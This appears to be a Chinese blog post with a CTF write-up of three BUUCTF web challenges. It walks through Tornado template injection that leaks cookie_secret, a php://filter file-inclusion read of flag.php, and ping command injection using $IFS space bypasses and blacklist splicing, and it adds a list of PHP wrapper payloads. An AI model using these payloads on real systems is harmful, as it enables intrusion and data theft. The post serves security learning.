BUUCTF涨见识之旅(一)

最新推荐文章于 2024-04-28 12:30:16 发布
最新推荐文章于 2024-04-28 12:30:16 发布
阅读量340 收藏 1
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46041723/article/details/108954362
版权

buuctf

前言

经过几周的联系,感觉自己可以接触buuctf上面的题了,就去尝试了一下,结果可真的是让我涨了好多见识啊!
卑微.jpg

easy_tornado

刚打开题目环境,发现了三个文件
在这里插入图片描述
依次打开发现
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

接着发现url框里的get内容http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/file?filename=/hints.txt&filehash=0dd45678a8a1205a0110d2450a842825
然后这里就有了一点点头绪。就是flag在/fllllllllllllag这个目录下,然后还要进行md5加密,所以构造payload为:

http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=加密后的内容

然后现在问题就是cookie_secret这个是什么。由于第一次遇见,所以就来请问师傅百度了。(顺便百度了一下render函数是什么)发现:
renderpython的一个模板,他们的url都是由filenamefilehash组成,filehash即为他们filename的md5值。
又加上题目提示tornado,所以就搜索到了cookie_secret存放在handler.settings中。
然后还意外地看到了大佬们的wp,说是ssti模板注入。然后验证是否为模板注入。
第一次构造payloadfile?filename=/fllllllllllllag提示error。并且url框出现
在这里插入图片描述
然后尝试http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/error?msg={{1}}发现页面出现在这里插入图片描述
接着尝试http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/error?msg={{1*8}}页面提示在这里插入图片描述
说明存在模板注入。
接着就构造payload获得cookie_secret的值http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/error?msg={{handler.settings}}
得到在这里插入图片描述
然后进行最后的md5加密用了PHP代码

<?php
$cookie_secret='b2b852cd-7505-4918-82d8-8ceab6e24cc9';
$filename='/fllllllllllllag';
$eco=md5($cookie_secret.md5($filename));
echo $eco;
?>

得到了最终的filehash值
在这里插入图片描述
所以构造最终payload:http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=16e766d7895b3c30ee8f3bafaa43d271
得到flag
在这里插入图片描述

include

打开题目在这里插入图片描述
点开之后提示
在这里插入图片描述
然后就开始find flag。刚开始没看题目,就一股脑做了,用了各种方法,抓包,f12,注入等等,发现始终只有一个样式。在这里插入图片描述
然后就知道了看题目的重要性。发现了题目名称是include。于是想到了文件包含和php伪协议。
所以就构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码后的字符在这里插入图片描述
然后base64解码得到flag
在这里插入图片描述

补充

php伪协议

常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file
file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data://

file://协议

file://
用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

使用方法:

file://文件绝对路径和文件名

php://协议

php:// 访问各个输入/输出流(I/O
streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://filter协议

php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

使用方法

?file=php://filter/read=convert.base64-encode/resource=
php://input协议

这个是平时做题用的比较多的。一般用来传一句话木马。不过注意是在POST方式传代码。

zip://协议

使用方法:

zip://archive.zip#dir/file.txt

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

compress.bzip2://

使用方法:

compress.bzip2://file.bz2

compress.zlib://

使用方法:

compress.zlib://file.gz

data://

data协议也是平时做题经常遇见的。
常用形式:?file=data://text/plain;base-64,<?php system('ls');?>

PING PING PING

打开题目,发现了
在这里插入图片描述
题目提示ping,然后页面有一个?ip=,所以应该是在搜索框里用get方式进行ping。
所以尝试:?ip=127.0.0.1
在这里插入图片描述
ping通了,说明思路没错,然后就查看了一下当前目录下的文件?ip=127.0.0.1|ls
在这里插入图片描述
发现有一个flag.php的文件,说明最后答案就在里面。然后就?ip=127.0.0.1|cat index.php (因为出现了两个文件,防止有什么绕过在这个文件里,就先查看了一下)
发现在这里插入图片描述
说明在命令行里有什么被过滤了,接着就猜测应该是存在了空格过滤,就尝试了一下
在这里插入图片描述
发现的确是空格过滤,于是就百度了一下常见的空格过滤绕过方式

<<>%20(space)%09(tab)$IFS$9${IFS}$IFS

发现是这几个。然后在这个题目里一个一个试,发现是$IFS$,所以尝试?ip=127.0.0.1|cat$IFS$1index.php
在这里插入图片描述

/?ip=

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){//过滤了bash
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){//过滤了flag的正则匹配
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

?>

元字符.:表示匹配除了换行符\n以外的任意字符
元字符*:表示多次匹配*前面的内容
.*连在一下,表示匹配任意次的不包含换行符的字符

然后利用黑名单拼接,
构造最终payload: ?ip=127.0.0.1;a=ag;cat$IFS$1fl$a.php
发现正常在这里插入图片描述
然后F12,在控制窗口找到flag在这里插入图片描述
flag=flag{ad04b7ca-ebe6-43dd-a5e2-f8aac85c784c}

墨子轩、
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php compress.zlib_compress/zlib(压缩/zlib)
weixin_36342477的博客
03-09 803
import "compress/zlib"概述索引示例概述打包 zlib 实现了读取和写入zlib格式压缩数据,如 RFC 1950中所述。实现提供了在读取和压缩期间解压缩的过滤器。例如,要将压缩数据写入缓冲区:varbbytes.Bufferw:=zlib.NewWriter(&b)w.Write([]byte("hello,world\n"))w.Close()并读回数据:...
BUUCTF逆向前八题
01-24
逆向工程是网络安全和软件开发领域中的一个重要技能,主要用于理解二进制程序的内部工作原理。在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,...
iis php 开启gzip_PHP开启gzip页面压缩实例代码
weixin_30798713的博客
03-09 79
GZIP(GNU-ZIP)是一种压缩技术。经过GZIP压缩后页面大小可以变为原来的30%甚至更小。这样用户浏览的时候就会感觉很爽很愉快!要实现GZIP压缩页面需要浏览器和服务器共同支持,实际上就是服务器压缩,传到浏览器后浏览器解压并解析。浏览器那边不需要我们担心,因为现在绝大多数浏览器都支持解析GZIP过的页面。我们只要把页面在服务器端压缩再输出到浏览器就行了。有点罗嗦,下面说正事:正如要制作压缩...
BUUCTF:Basic 解析(一)
最新发布
Flag少侠的博客
04-28 852
Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6238
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7608
BUUCTF题目Misc部分wp(持续更新)
BUUCTF Misc杂项前十二道题的思路和感悟
热门推荐
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起...睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜...得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF-逆向
weixin_52125240的博客
04-11 5386
BUUCTF-ReBUUCTF-逆向1.easyre2.reverse13.reverse2 BUUCTF-逆向 1.easyre 先用虚拟机看看是多少位的文件; 拖进IDA看看,一下子就出来了; 2.reverse1 先用虚拟机看看是多少位的文件; 打开IDA,查找字符串; 点击View->Open subviews->Strings 然后观察伪代码 所有的 ’ o ’全都变成 ’ 0 ‘ ; flag{hell0_w0rld} 3.reverse2 一样的看看文件是多少位的;
BUUCTF】Web题解
xuanyulevel6的博客
08-08 5166
BUUCTF】Web题解
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
m0_73935461的博客
04-09 2441
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
BUUCTF-这是什么(学习分享)
qq_74948624的博客
12-07 553
题目显示:小明是一个软件专业的高材生,但是老师布置的这次的作业似乎不怎么靠谱,因为他们老师以前是学物理的!喜欢乱七八糟命名文件,还喜欢奇奇怪怪的编码。你快帮小明看一下这题,小明准备好了一箱子辣条。注意:得到的 flag 请包上 flag{} 提交。打开文件发现是.apk文件,我们转为txt文件就发现[][(!+[]+[+[]]]这类编码。直接上解密网站得到flag。
BUUCTF:[强网杯 2019]Upload
末初的CSDN博客
03-27 3237
参考:https://www.zhaoj.in/read-5873.html 稍微测试了一下,不存在注入或者万能密码登录,先注册登录 先传一句话木马图片上去看看 上传的是一张jpg的图片,传上去之后被改后缀为png,而且可以看到路径和文件名都进行了重命名使用md5值 目录扫描出一个www.tar.gz在网站根目录,使用phpstorm打开,发现是ThinkPHP5框架 而且存在....
buuctf
weixin_57439582的博客
01-01 320
ACTF2020 新生赛Exec1
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 420
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
php compress.zlib_配置PHP的ZLIB模块,实现网页GZIP压缩?
weixin_39556590的博客
03-09 133
配置PHP的ZLIB模块,实现网页GZIP压缩?后面是个问号。是的,我只是想在这篇博文中记录两件事情:1, 如何配置PHP的ZLIB模块,以及相关配置细节;2, 不用配置PHP的ZLIB模块,只配置Apache,也可以实现网页的GZIP压缩。直接用Apache的配置实现GZIP压缩云上小悟独立博客使用Apache2.4,没有配置PHP的ZLIB模块,就很好地实现了网页GZIP压缩。具体的配置,请参...
buuctf misc 另外一个世界
03-16
buuctf misc 另外一个世界是指在计算机安全比赛中,misc类型的题目通常是指一些杂项的题目,它们可能与其他类型的题目不太相似,需要参赛者拥有广泛的知识和技能才能解决。而另外一个世界指的是这道题目的思路和解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值